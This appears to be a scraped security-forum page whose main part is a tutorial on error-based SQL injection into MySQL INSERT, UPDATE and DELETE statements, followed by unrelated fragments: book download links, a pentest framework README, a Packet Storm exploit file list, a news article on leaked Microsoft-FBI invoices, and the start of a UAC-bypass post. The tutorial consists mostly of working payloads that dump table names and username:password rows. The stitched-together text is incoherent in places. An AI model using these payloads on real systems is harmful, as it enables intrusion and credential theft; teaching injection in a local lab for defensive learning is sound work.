Fi8sVrs

SQL Injection in Insert, Update and Delete Statements Author: Osanda Malith Jayathissa Introduction Most of the time when we talk about SQL injection we extract data by using the union keyword, error based, blind boolean and time based injection methods. All this comes under a place where the application is performing a SELECT statement on the back-end database. How to inject into places where the application is performing an INSERT, UPDATE, DELETE statement? For example, INSERT statements are used in applications when it wants to store IP addresses, user agent strings, referrer URLs and other data within the database. While manipulating with user accounts when creating a new password, changing names, deleting accounts these statements are used. Not only just user input if we can fuzz around into whatever the application is taking as input and if they aren’t properly sanitized to filter we can go ahead and inject (Assuming that there are no WAFs or any blacklists). This paper is based on the MySQL error response. In the web application mysql_error() should be echoed back to us. Lab Setup Let’s create a database first by the name `newdb` and create one sample table to practice our injections. Stick to your localhost. Don’t go ahead and test against live websites without prior permission. I take no responsibility for any damage you cause. Create database newdb; use newdb CREATE TABLE users ( id int(3) NOT NULL AUTO_INCREMENT, username varchar(20) NOT NULL, password varchar(20) NOT NULL, PRIMARY KEY (id) ); Syntax for Injecting Now let’s insert some sample data into our database. The syntax would be INSERT INTO users (id, username, password) VALUES (1, 'Jane', 'Eyre'); The above query uses single quotes. So keep in mind that we have to inject like this. INSERT INTO users (id, username, password) VALUES (1, ' [B]'Inject Here'[/B] ', 'Nervo'); If the query uses double quotes the injection should too use double quotes. INSERT INTO users (id, username, password) VALUES (1, ' [B]'Inject Here'[/B] ', 'Nervo'); The same applies to UPDATE and DELETE statements. You can get to know about the syntax by breaking the statement. Apply quotes in front where necessary to create a valid SQL query. Note that in these kinds of injections MySQL comments like --, # won’t comment out the rest of the query, they are also taken as normal characters. Injection using Updatexml() If you know about XPATH injections you can use that knowledge in here. Usually we use the updatexml() and extractdata() functions. The same can be used in here. Assuming that you know about XPATH injections I will proceed. Our payload would be or updatexml(1,concat(0x7e,(version())),0) or Insert INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e (version())),0) or'', 'Nervo'); ERROR 1105 (HY000): XPATH syntax error: '~5.5.35-0ubuntu0.12.04.1' Update UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or'' WHERE id=2 and username='Olivia'; Delete DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or''; Extraction of Data For the sake of this paper I will explain about dumping data only using the insert statement. There is no change in UPDATE and DELETE statements, just follow the exact same method. For extracting the tables from the information_schema database we can build our payload like this or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or Our query to extract the tables would be INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or '', 'Nervo'); ERROR 1105 (HY000): XPATH syntax error: '~users' To extract the columns the query would be like this. In my case the table_name would be 'users'. Use the limit function to get the rest of the column names. INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1)),0) or '', 'Nervo'); ERROR 1105 (HY000): XPATH syntax error: '~id' Let’s dump the first entry in the 'users' table using INSERT and DELETE. INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '', 'Nervo'); ERROR 1105 (HY000): XPATH syntax error: '~1:Olivia:Nervo' DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or ''; ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre' You can retrieve tables, columns using the Updatexml() function in insert, UPDATE and DELETE statements. However you cannot dump data using the UPDATE statement if you are in the same table. For example now I am in the users table. If I run this query UPDATE users SET password='Nicky' or updatexml(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE id=2 and username='Olivia'; This won’t give out any data because we are trying to use the target database for dumping data. In these kinds of scenarios you the target database should be different. Once again for the sake of this paper create a new database as 'students' with the columns id, name, address and insert some values. Now if the injection point was in the 'students' table we can dump data from the 'users' table other than the data in the table itself. This applies to the UPDATE statement only. UPDATE students SET name='Nicky' or Updatexml(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE id=1; ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre' If you are stuck in the UPDATE statement injection you can use double query injection for that. I have discussed in the next few titles. Injection Using extractvalue() This function can be used in XPATH injections too. However our payload using this function would like this. or extractvalue(1,concat(0x7e,database())) or Insert We can apply it in the insert statement like this. INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,database())) or'', 'Nervo'); ERROR 1105 (HY000): XPATH syntax error: '~newdb' Update UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Nervo'; ERROR 1105 (HY000): XPATH syntax error: '~newdb' Delete DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or''; ERROR 1105 (HY000): XPATH syntax error: '~newdb' Extraction of Data Follow the same method as discussed in updatexml() function. This is an example of retrieving all the tables from the information_schema database. INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1))) or'', 'Nervo'); ERROR 1105 (HY000): XPATH syntax error: '~users' To extract the column names the payload would be like this as in my case the table is 'users'. INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1))) or'', 'Nervo'); ERROR 1105 (HY000): XPATH syntax error: '~id' The final query to dump the username and password would be INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1))) or '', 'Nervo'); ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre' You can use the same injection to extract data as mentioned above in UPDATE and DELETE statements. In dumping the same rules apply to the UPDATE statement as mentioned above in updatexml() method. Injection Using name_const() This function was added in MySQL 5.0.12 and it returns any given value. We can use this function in injection. The payload would be or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or Insert We can inject into the insert statement using the name_const() function like this. INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '', 'Nervo'); As expected this query returns the error with the version. ERROR 1060 (42S21): Duplicate column name '5.5.35-0ubuntu0.12.04.1' Update The UPDATE statement would be in the exact same format. UPDATE users SET password='Nicky' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2 and username='Nervo'; Delete The DELETE statement also would look the exact same way. DELETE FROM users WHERE id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a)or ''; Extraction of Data In the latest versions of MySQL you can only get the version out of the name_const() function. But still in older versions of MySQL which is greater than or equal to 5.0.12 we can extract data further. To demonstrate this I will be using MySQL 5.0.45. First we need to do a simple test to check whether we can extract data or not. For that we can perform a simple SELECT query. INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo'); If you get this kind of an error related to name_const we cannot go further. ERROR 1210 (HY000): Incorrect arguments to NAME_CONST If you get this kind of an error you can go forward and extract data. ERROR 1060 (42S21): Duplicate column name '2' Now we can extract the table names like this from the information_schema database. INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1))a) or '', 'Nervo'); ERROR 1060 (42S21): Duplicate column name 'users' Let’s extract the column names from the table ‘users’. INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1),name_const(( SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1))a) or '', 'Nervo'); ERROR 1060 (42S21): Duplicate column name 'id' Finally we can extract the data like this. INSERT INTO users (id, username, password) VALUES (2,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const(( SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1))a) or '', 'Nervo'); ERROR 1060 (42S21): Duplicate column name '1~Jane~Eyre' Double Query Injection We can directly extract data from the database by using double query injection. However in MySQL there is no such thing as double queries. This can also be called sub query injection. All we are trying to do is retrieve data in the form of an error. We can also define it as error based injection. Insert INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'Nervo'); ERROR 1062 (23000): Duplicate entry '~'newdb'~1' for key 'group_key' Update UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo'; ERROR 1062 (23000): Duplicate entry '~'newdb'~1' for key 'group_key' Delete DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' ; ERROR 1062 (23000): Duplicate entry '~'newdb'~1' for key 'group_key' Extracting Data I assume you know about error based injections. We can easily dump the table names like this. Read through the query if it is hard to understand at a glance. INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo'); ERROR 1062 (23000): Duplicate entry '~'students'~1' for key 'group_key' Columns names can be dumped in this manner. In my case the table is users and the database is 'newdb'. INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo'); ERROR 1062 (23000): Duplicate entry '~'id'~1' for key 'group_key' Use the limit function to go forward. Finally the usernames and passwords which is our secret data can be extracted like this. INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo'); ERROR 1062 (23000): Duplicate entry '~'Olivia'~1' for key 'group_key' The same applies to UPDATE and DELETE. You can inject using error based injection to those two statements too. There is no change follow the same syntax. Other Variations I’ve noticed some variations in our payload. You can inject using these methods too. ' or (payload) or ' ' and (payload) and ' ' or (payload) and ' ' or (payload) and '=' '* (payload) *' ' or (payload) and ' " – (payload) – " Conclusion I hope now you can understand different methods of injection in INSERT, UPDATE and DELETE statements. Knowing manual injection helps when the injection points are different, in bypassing WAFs and helps to determine the correct automation in dumping data. In my experience in finding vulnerabilities as a security researcher in the real world, I’ve came across scenarios where input was not properly sanitized in these statements. Use this knowledge for educational purposes only. References MySQL :: Developer Zone The SQL Injection Knowledge Base Source

da, este dar contra cost World Numbers - Global Telephone Numbers Redirected Anywhere

CEH - Certified Ethical Hacker Practice Exams 500+ practice exam questions covering all CEH exam objectives Realistic questions with detalied answer explanations Electronic content includes: Two practice exams PDF eBook [*]Written by an IT security and education expert Author: MATT WALKER Download: http://www.scribd.com/doc/228144469/CEH-Certified-Ethical-Hacker-Practice-Exams

Contents: 1 Before you begin1 1.1Is this book for you?11.2How to use this book21.3Setting up your lab environment3 Choosing a SQL Server edition for your lab3 ? Selecting a version of Windows for your lab4 ? My recommendation for your lab environment5 ? A word about SQL Server versions5 1.4SQL Server documentation51.5Online resources61.6A word on my recommendations61.7Being immediately effective with SQL Server7 2 Server assessment and configuration8 2.1Identifying instances and versions82.2Identifying databases112.3Identifying other server objects13 CONTENTS x 2.4Inventorying the server configuration142.5Hands-on lab15 3 T-SQL crash course16 3.1SELECT queries16 A basic SELECT query17 ? Returning specific rows from the table19 ? Delimiting string and date values20 Sorting results20 ? Finding T-SQL documentation21 3.2DELETE, UPDATE, and INSERT queries23 DELETE queries23 ? UPDATE queries24 INSERT queries24 3.3Assessing a database’s structure253.4Multitable SELECT queries313.5Hands-on lab33 4 Managing databases34 4.1Configuring database options344.2Detaching and attaching databases364.3Assessing database storage384.4Identifying potential performance concerns in storage38 Problems with file layout38 ? Problems with file size40 Filegroups41 4.5System databases414.6An overview of storage hardware424.7Hands-on lab43 5 Backup and recovery44 5.1The transaction log445.2How backups work47 Making a full database backup48 ? Making a differential database backup48 ? Making a transaction log backup48 5.3How restoration works49 Preparing for recovery50 ? Starting the recovery50 5.4Model backup and recovery scenarios525.5Special procedures for system databases54 CONTENTS xi 5.6Backup and recovery using T-SQL or PowerShell545.7Hands-on lab55 6 Authentication: who are you?56 6.1Understanding logins56 Windows Authentication57 ? Mixed Mode Authentication58 6.2Understanding database users596.3How the real world often does authentication626.4Understanding application roles636.5Hands-on lab64 7 Authorization: what are you allowed to do?65 7.1Understanding SQL Server permissions65 Securing database objects66 ? Revoking permissions67 Column-level permissions68 ? The many sources of permissions68 7.2Using server roles687.3Using database roles697.4Schemas and owners70 Owners70 ? Schemas70 7.5Permission chains717.6How the real world often does authorization737.7Hands-on lab74 8 Accounting: what did you do?75 8.1Triggers758.2SQL Server Profiler768.3Event logs and C2 auditing768.4SQL Audit76 SQL Audit architecture76 ? Creating an audit77 Using SQL Audit for security auditing79 Using SQL Audit for troubleshooting80 8.5Hands-on lab81 9 Analyzing indexes82 9.1Index basics829.2Heaps83 Download: http://www.scribd.com/doc/228142928/Learn-SQL-Server-Administration-in-a-Month-of-Lunches

What is sb0x-project? "sb0x-project is A Lightweight Framework for PenTesting Written in Python" Platforms: Linux BSD "Or Unix System" Version 1.0.6 Version 1.0.6 is prototype Basic Usage Main sb0x-shell: help, ? - print help. load - load modules. exit, q - exit. load shell: help, ? - print help list - modules list back - back to main info - dump module info, Usage info module_name for autocomplete use 'TAB' Example: [1] load => admin_finder for more information Watch the Video Tutorial: Video Tutorials Run simple HTTP Server ./sb0x.py -s [PORT] Run sb0x.py without header ./sb0x.py -n How To write sb0x Module if you are Python Developer Take a look in the API tutorial: sb0x-project API Tutorial How to Install sb0x First install python2.7 Download the sb0x repository: Download and run sb0x.py if You you geting any ERRORs Please report for: Issue/Bug Old Versions sb0x old versions in Sourceforge sb0x 1.0.5 sb0x 1.0.4 Contributing "Contributions are very welcome!" Write sb0x module and send a Pull request. Clone and Edit the Wiki Create the sb0x-logo Create tutorials Report bugs, Ideas etc.. and more. Licese: GPL 3 Current dev Version: 2.0.x Autohr: Levi Nachmani (levi0x0) Source

This archive contains all of the 220 exploits added to Packet Storm in March, 2014. list: ~/1403-exploits# ls ajaxpagination-lfi.txt aker-xss.txt alienvault450-saql.txt alliedtelesis-exec.txt allplayer581-overflow.txt allplayer_m3u_bof.rb.txt applefacetime-disclose.txt appletvitunes-disclose.txt arabicprawn-inject.txt arraynetworks-escalate.txt array_vxag_vapv_privkey_privesc.rb.txt aspnuke207-redir.txt audiocoder0829-corrupt.txt b2evolution-disclose.txt beheersysteem-exec.txt bigace-sqlxsslfi.txt bigdump-shell.txt bypassuac_injection.rb.txt bytecms-xss.txt calaverauploader-overflow.txt canonpixma-disclose.txt chat2-sqlxss.txt chatness-fixation.txt ciscorv110w-bypass.pdf cla-2014-001-php-font-lib-0.3-xss.txt clansphere20114-xss.txt clickdesk-xss.txt clipshare41-lfi.txt cmsimple354-xss.txt corappjobsearch-sql.txt CORE-2014-0002.txt coryapp-sql.txt cosmoshop-filewrite.txt couchdb-dos.txt CVE-2014-2238.rb.txt dir600l-xsrf.txt dotityourself-exec.txt easeustodo-credentials.txt editstuff-exec.txt emccloudtiering-xxe.txt estore12-sql.txt etchat307-passwd.txt eventyplus-xsrf.txt exec_shellcode.rb.txt fastcgisearch-exec.txt fitnessewiki-exec.txt fitnesse_wiki_rce.rb.txt freedownloadmanager-overflow.txt freepbx_config_exec.rb.txt ganib-sql.txt gdstarrating1922-xssxsrfsql.txt getgodownloadmanager-overflow.txt getgo-overflow.txt glambombworld-header.txt gnuboardautosave-sql.txt gnupanel-xssxsrf.txt goldmp4player-overflow.rb.txt gommp-corrupt.txt gomvc11060-corrupt.txt googleanalyticsmu-xsrf.txt Google-Report2702.pdf guppy-crlfxss.txt haihaisofthup-overflow.txt haihaisoftup-overflow.txt hdcsts-xsrf.txt herpesnet.class.py.txt horde_unserialize_exec.rb.txt hordewebmail-openredir.txt hp_dataprotector_exec_bar.rb.txt icamworkstation-bypass.txt ilchcms-xss.txt innoedit-exec.txt interworx-sql.txt ios7-exec.txt irc-outofbounds.txt ithoughts-xssuploaddos.txt jetvideo811-dos.txt joids-xssfixation.txt joomla322-xss.txt joomlaajaxshoutbox-sql.txt joomlaextplorer-xss.txt joomlafreichat-xss.txt joomlakunena-xss.txt joomlamulticalendar-xss.txt joomlapbbooking-xss.txt joomlayoutubegallery-xss.txt katello_satellite_priv_esc.rb.txt kcfinder253-shell.txt kenticocms-enumerate.txt kmplayer380117-overflow.txt lbe-sshkey.txt lifesize_uvc_ping_rce.rb.txt lightaudioplayer-corrupt.txt linex-passwd.txt litepublisher-xss.txt loadbalancerorg_enterprise_known_privkey.rb.txt luxcal-xsrfsql.txt macsaffir-dos.txt mantisbt1216-sql.txt mcafeeassetmanager-traversalsql.txt mediawiki1180-disclose.txt meiupic-lfi.txt microp-overflow.txt mohachat-xssredir.txt monocart-enumerate.txt morxkloxo-sql.txt mp3info085a-overflow.txt ms14_012_textrange.rb.txt mybbuploader-shell.txt NDSA20140311.txt netvolutionwcm-sql.txt nginx-1.4.0-exp.tgz nocms-xss.txt ntp_spquery.c ocportal-xsslfi.txt opencart1561-sql.txt openclassifieds2212-xss.txt opendocman127-sql.txt opensupports-bypassxsrf.txt opensupports-shell.txt opensupports-sql.txt openx2811-xsrf.txt oracledemantra-bypass.txt oracledemantra-leak.txt oracledemantra-lfi.txt oracledemantra-sql.txt oracledemantra-storedxss.txt oracledemantra-xss.txt oscmax-xsrf.txt owncloud-exec.txt oxatis-xss.txt oxideshop-xsscrlf.txt perf_swevent_init.c phonerlite-disclose.txt phploginscript-xss.txt phpsitemanager-xss.txt picsengine-sqlxss.txt primocms-exec.txt procentiaintellipen-sql.txt proxmox-xss.txt qe416-xss.txt qnxifwatchd-escalate.txt qnx-io-graphics.c qnx-phfont.c qnxphfont-enumeration.txt qnxphgrafx-enumerate.txt qnxphoton-dosescalate.txt qnxpppoectl-disclose.txt quantum_dxi_known_privkey.rb.txt quantum-root.txt quantum_vmpro_backdoor.rb.txt quantumvmpro-backdoor.txt rlpdaemon-dos.txt rt-sa-2014-002.txt SA-20140307-0.txt safari_user_assisted_download_launch.rb.txt SecPod_BarracudaDrive_Mult_XSS_Vuln.txt seeddms-shellxsstraversal.txt seportal25spid-sql.txt seportal_sqli_exec.rb.txt solidworks_workgroup_pdmwservice_file_write.rb.txt spagobi-inject.txt spagobi-xssshell.txt spagobi-xss.txt square031-xss.txt SSCHADV2013-YahooBB-001.txt SSCHADV2013-YahooBB-002-xss.txt SSCHADV2014-YahooBB-004-YahooBB-005.txt star57-exec.txt synologydsm-sql.txt trixbox-exec.txt uagcms-fixation.txt ubeeevw3200-xsrf.txt ubeeevw3200-xss.txt vfu-overflow.txt viruschaser-overflow.txt VL-1100.txt VL-1191.txt VL-1229.txt VL-1230.txt VL-1231.txt VL-1232.txt VL-1233.txt VL-1234.txt VL-1235.txt VL-1237.txt VL-1239.txt vlc-xss.txt vtigercrm56-lfi.txt watchguardxtm-xss.txt webmin1670-xss.txt welcartecommerce-sqlxss.txt wmp11057215230-corrupt.txt wpbarclaycart-shell.txt wpbizintel-shell.txt wpfcb-shell.txt wphtmlsitemap-xsrf.txt wpjsmultihotel-dosxss.txt wplayerslider-xsrftraversal.txt wppremiumgallery-shell.txt wpsixtees-shell.txt wpthecotton-shell.txt wpvadvsuploadify-shell.txt x7chat-xss.txt yiiframework-xsrf.txt yokogawa_bkbcopyd_bof.rb.txt yokogawa_bkhodeq_bof.rb.txt ZSL-2014-5171.txt ZSL-2014-5172.txt ZSL-2014-5173.txt ZSL-2014-5174.txt ZSL-2014-5175.txt ZSL-2014-5176.txt ZSL-2014-5177.txt ZSL-2014-5178.txt ZSL-2014-5179.txt ZSL-2014-5180.txt ZSL-2014-5181.txt ZSL-2014-5182.txt zyxel-bypass.txt Download: Download: Packet Storm New Exploits For March, 2014 ? Packet Storm

SkypeFreak A Cross Platform Forensic Framework for Skype Fully Open Source Written in Python 2.7 Supports Windows, Linux and OS X Will be ported to Ruby and PHP soon Won't work with alternative accounts using Microsoft and Facebook What is this all about? This is a small idea of mine. A full open source forensic framework for Skype. I love to analyze applications and explore how things work behind the scenes. The main goal of this application is to aid in forensic investigations. What is so special in this? Actually there are many other tools which could the same thing, but I thought writing a open source tool to help people understand what is really going on and anyone can customize this according their needs. Will there be a big Forensic framework? Yes me, Hood3dRob1n and Nick Knight are planning a full fledged forensic framework including most famous applications such as Firefox, Google Chrome, Safari, Opera, etc. This will be available in Python, Ruby and PHP. Conclusion None of the application you use today are safe. They often log what all you do. Do not use this application without any kind of permissions because it would result in violation of privacy. The author takes no responsibility of any kind of damage you cause. Please use this for educational purposes only. Download: .zip | .tar.gz Author: https://twitter.com/OsandaMalith SkypeFreak by OsandaMalith

Microsoft often charges the FBI's most secretive division hundreds of thousands of dollars a month to legally view customer information, according to documents allegedly hacked by the Syrian Electronic Army. The SEA, a hacker group loyal to Syrian President Bashar al-Assad, is best known for hijacking Western media companies' social media accounts. (These companies include the Associated Press, CNN, NPR, and even the Daily Dot.) The SEA agreed to let the Daily Dot analyze the documents with experts before the group published them in full. The documents consist of what appear to be invoices and emails between Microsoft's Global Criminal Compliance team and the FBI's Digital Intercept Technology Unit (DITU), and purport to show exactly how much money Microsoft charges DITU, in terms of compliance costs, when DITU provides warrants and court orders for customers' data. In December 2012, for instance, Microsoft emailed DITU a PDF invoice for $145,100, broken down to $100 per request for information, the documents appear to show. In August 2013, Microsoft allegedly emailed a similar invoice, this time for $352,200, at a rate of $200 per request. The latest invoice provided, from November 2013, is for $281,000. None of the technologists or lawyers consulted for this story thought that Microsoft would be in the wrong to charge the FBI for compliance, especially considering it's well within the company's legal right to charge "reasonable expenses." Instead, they said, the documents are more of an indication of just how frequently the government wants information on customers. Some of the DITU invoices show hundreds of requests per month. For ACLU Principal Technologist Christopher Soghoian, the documents reiterated his stance that charging a small fee is a positive, in part because it creates more of a record of government tracking. In 2010, Soghoian actually chided Microsoft for not charging the Drug Enforcement Agency for turning over user records when instructed to by courts, noting that companies like Google and Yahoo did. Nate Cardozo, a staff attorney for the Electronic Frontier Foundation, agreed, and told the Daily Dot the government should be transparent about how much it pays. "Taxpayers should absolutely know how much money is going toward this," he said. Compared with the National Security Agency, which has seen many of its programs exposed by former systems analyst Edward Snowden, DITU has a low profile. But it runs in the same circles. Multiple law enforcement and technology industry representatives described DITU to Foreign Policy as the FBI's liaison to the U.S.'s tech companies, and the agency's equivalent to the NSA. To that note, DITU is mentioned as a little-noticed detail from Snowden slides that detail the NSA's notorious PRISM program, which allows it to collect users' communications from nine American tech companies, including Microsoft. One slide explicitly mentions DITU's role in getting data from those companies. PRISM screengrab via freesnowden.is It's impossible to fully verify the documents' authenticity without confirmation from someone with direct knowledge of Microsoft and DITU compliance practices, and those parties refused to comment. But there are multiple signs that indicate the documents are legitimate. "I don’t see any indication that they’re not real," Cardozo said. "If I was going to fake something like this, I would try to fake it up a lot more sensational than this." That the SEA twice attacked Microsoft with a phishing attack before leaking these documents is well documented. On Jan. 11, the day of the second attack, the SEA hijacked the company's blog and Twitter account. One representative told the Verge that day that it was part of a bigger plan: "We are making some distraction for Microsoft employees so we can success in our main mission," the hacker said. In a blog post nearly two weeks later, Microsoft admitted: "[W]e have learned that there was unauthorized access to certain employee email accounts, and information contained in those accounts could be disclosed. It appears that documents associated with law enforcement inquiries were stolen." A source familiar with several of the email addresses of the Microsoft employees in the emails confirmed the addresses were authentic. When reached for comment, the company reiterated its stance that it complies with government demands as required by law. A spokesperson added that "as pursuant to U.S. law, Microsoft is entitled to seek reimbursement for costs associated with compliance with a valid legal demands. ... To be clear, these reimbursements cover only a portion of the costs we actually incur to comply with legal orders." A spokesperson for the FBI declined to comment and deferred questions to Microsoft, "given that SEA claims to have stolen the documents" from there. Indeed, there's plenty of history for communications companies charging compliance costs for cooperating with intelligence agencies' request for people's information. The CIA pays AT&T more than $10 million annually for access to its phone records, government officials told the New York Times. The Guardian, referencing other documents provided by Snowden, has reported that the NSA paid millions to Microsoft and the other eight companies used in PRISM for compliance costs. Only the earliest of the Microsoft invoices provided by the SEA, dated May 10, 2012, breaks down requests by type of legal request, and it shows them to all explicitly come legally, though nothing in the documents indicates the later invoices refer to illegal surveillance. User information by a subpoena costs $50, a court order $75, and a search warrant $100. The requests come from FBI offices all around the U.S. Later invoices to DITU don't break down requests to subpoena and court order, though the format is otherwise similar, and costs begin to rise to $100 and $200 per request. And though the costs vacillate slightly depending on the invoice, they appear to be roughly in line with industry standards. Ashkan Soltani, who coauthored a Yale study on how much it costs agencies like the FBI to track targets by tapping phone companies for their cellphone locations, said that the range of costs seen in the SEA documents—$50 to $200 per order to Microsoft—"did seem a fair cost." The invoices don't make explicit the exact type of information Microsoft charges DITU to provide, which may account for the price changes. The biggest suspicion espoused by the experts we spoke with was just how apparently easy it was for the SEA to acquire this sort of information. If the documents aren't forged, that means Microsoft and the FBI simply email invoices and references to a presumably classified process. "I’m surprised that they’re doing it by email," Soltani said. "I thought it would be a more secure system." Via The Daily Dot - Hacked emails show what Microsoft charges the FBI for user data

UAC is User Account Control. Introduced in Windows Vista, UAC is a collection of technologies that make it convenient possible to use Windows without administrator privileges and elevate your rights when needed. UAC has a lot of moving parts and encompasses a lot of things. This post focuses on Windows Integrity levels and UAC elevation prompts. I will first explain some UAC concepts and then dive into three attacks to get past UAC. Process Integrity Levels In Windows Vista and later, processes run at three different levels of integrity: high, medium, and low. A high integrity process has administrator rights. A medium integrity process is one that runs with standard user rights. A low integrity process is very restricted. A low integrity process can not write to the registry and it’s limited from writing to most locations in the current user’s profile. Protected Mode Internet Explorer runs with low integrity. The idea is to limit the amount of damage an attacker may do if they exploit the browser. Most desktop applications run in a medium integrity process, even if the current user is a local administrator. Use Process Explorer to see which Integrity level your programs are running at. UAC Settings To perform a privileged action, a program must run another program and request the high integrity level at that time. If the user is an administrator, what happens next will depend on their UAC settings. There are four UAC settings: Always Notify. This setting is the highest UAC setting. It will prompt the user when any program, including a built-in Windows program wants higher privileges. Notify me only when programs try to make changes to my computer. This is the default UAC setting. This setting does not prompt the user when some built-in Windows program want higher privileges. It will prompt the user when any other program wants higher privileges. This distinction is important and it plays into the UAC bypass attack that we will cover in a moment. Notify me only when programs try to make changes to my computer (do not dim my desktop). This is the same as the default setting, except the user’s desktop does not dim when the UAC elevation prompt comes up. This setting exists for computers that lack the computing power to dim the desktop and show a dialog on top of it. Never notify. This option takes us back to life before Windows Vista. On Windows 7, if a user is an administrator, all of their programs will run with high integrity. On Windows 8, programs run at the medium integrity level, but anything run by an Administrator that requests elevated rights gets them without a prompt. If the user is not an administrator, they will see a prompt that asks for the username and password of a privileged user when a program tries to elevate. Microsoft calls this “over the shoulder” elevation as someone is, presumably, standing over the shoulder of the user and typing in their password. If the UAC settings are set to Never Notify, the system will automatically deny any requests to elevate. Who Am I? When I get a foothold from a client-side attack, I have a few questions I like to answer right away. First, I like to know which user I’m currently executing code as. Second, I like to know which rights I have. With UAC this becomes especially complicated. One way I like to sort myself out is with the Windows command: whoami /groups. This command will print which groups my current user belongs to. This command will also print which integrity level my command ran with. If my command ran in a high integrity context, I will see the group Mandatory Label\High Mandatory Level. This means I have administrator rights. If my command ran in a medium integrity context, I will see the group Mandatory Label\Medium Mandatory Level. This means I have standard user rights. RunAs If I find myself in a medium integrity process run by a user in an administrators group, there is potential to elevate from standard user rights to administrator user rights. One option is to use the ShellExecute function with the runas verb. This will run a program and request elevated rights. If UAC is set to anything other than Never Notify, the user will see a prompt that asks them if they would like to allow the action to happen. This is not completely implausible. Oracle’s Java Updater randomly prompts me all of the time. The Metasploit Framework’s exploit/windows/local/ask module by mubix implements this attack for you. Make sure you set EXE::Custom to avoid anti-virus! If the user accepts the prompt, the system will run my program in a high integrity context. Remember, medium integrity is standard user rights. High integrity is administrator rights and this is what we’re after. Bypass UAC Bypass UAC The RunAs option prompts the user and that’s an opportunity to get caught. We want a way to spawn a high integrity process from a medium integrity process without a prompt. Fortunately, there is a way to do this, it’s the bypass UAC attack. This attack comes from Leo Davidson who made a proof-of-concept for it in 2009. David Kennedy and Kevin Mitnick popularized this attack in a 2011 